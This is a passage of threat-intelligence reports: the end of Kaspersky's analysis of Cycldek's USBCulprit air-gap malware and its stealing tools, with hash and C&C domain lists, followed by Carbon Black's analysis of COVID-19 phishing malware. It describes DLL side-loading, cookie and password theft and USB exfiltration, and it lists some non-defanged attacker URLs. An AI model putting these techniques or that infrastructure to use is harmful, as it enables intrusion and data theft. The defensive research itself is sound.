below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)\n\n_**_Figure 5_: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.** _\n\nFurthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "modified": "2020-06-03T10:00:32", "published": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2020-03-19T21:36:32", "bulletinFamily": "blog", "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0798"], "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. HIstorically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access **\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link.. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram shown below shows a visual representation of the underlying effects of opening this particular email attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment name **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe **which when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan, by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, executed an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: **csc.exe** and **cvtres.exe**, which are commonly seen in the defense evasion, [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. \n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are disguised as malware. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potential malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map **\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upwards trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety or different threats,many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing 